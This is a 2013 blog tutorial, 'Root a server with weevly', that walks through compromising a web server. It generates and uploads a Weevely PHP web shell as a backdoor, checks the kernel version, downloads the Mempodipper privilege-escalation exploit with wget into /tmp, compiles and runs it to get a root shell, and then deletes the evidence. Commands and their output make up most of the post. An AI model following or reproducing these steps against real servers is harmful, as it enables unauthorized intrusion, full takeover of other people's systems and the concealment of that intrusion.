Home Unlabelled Root a server with weevly

Root a server with weevly

By
Friday, January 11, 2013
Read
Add Comment
    Weevely to root tutorial
     
    wget https://github.com/downloads/epinna/Weevely/weevely-0.7.1.tar.gz
    tar -zxvf weevely-0.7.1.tar.gz
    cd to the new dir
    now type ./weevely.py generate
     
    is the bit you change to any password
    EG ./weevely.py generate Password123
     
    this will create a weevely.php file in your current dir
    if you're sill unsure this is an in depth tutorial on this https://github.com/epinna/Weevely/wiki/Tutorial
     
    Now once you have uploaded you weevely.php file to the target server and you know what dir to locate it in we go onto the next step
     
    connecting to your backdoor
    ./weevely.py http://www.targetsite.com/dir/weevely.php
     
    the is what you chose when making the backdoor
     
    Should look like this:
     
    user@IMNOTAPC:~$ ./weevely.py http://xxxxx.xx/weevely.php Password123
          ________                      __
         |  |  |  |-----.----.-.--.----'  |--.--.
         |  |  |  |  -__| -__| |  | -__|  |  |  |
         |________|_____|____|___/|____|__|___  | v0.7.1
                                          |_____|
                  Stealth tiny web shell
     
    [+] Starting terminal, shell probe may take a while
    [+] List modules with and show help with :show [module name]
     
     
    now that we have the back door its time to find out the linux kernel version
    type:
    uname -a
    response:
     
    Linux xxxxxxxx.miniserver.com 2.6.39.4-x1 #1 SMP Wed Oct 26 11:39:05 GMT 2011 i686 GNU/Linux
     
    Note the ker version is 2.6.39, there is a local root exploit for this, so we can google
    "2.6.39 local root exploit"
    there is one on exploit-db
     
    now I go back to my shell then type:
    cd /tmp
    this is because /tmp will always let you write the file to it
     
    and type:
    wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
     
    then type:
    gcc -o test mempodipper.c
    replace mempodipper.c with the exploit suited to your server
    now to set permissions :
    chmod u+x test
     
    now to run:
     
    ./test
     
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================
     
    [+] Ptracing su to find next instruction without reading binary.
    [+] Creating ptrace pipe.
    [+] Forking ptrace child.
    [+] Waiting for ptraced child to give output on syscalls.
    [+] Ptrace_traceme'ing process.
    [+] Error message written. Single stepping to find address.
    [+] Resolved call address to 0x8049984.
    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/411/mem in child.
    [+] Sending fd 6 to parent.
    [+] Received fd at 6.
    [+] Assigning fd 6 to stderr.
    [+] Calculating su padding.
    [+] Seeking to offset 0x8049978.
    [+] Executing su with shellcode.
     
    root@xxxxx.miniserver.com:#
     
    YOU HAVE ROOT :D
     
    don't forget to delete them
    rm -r
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us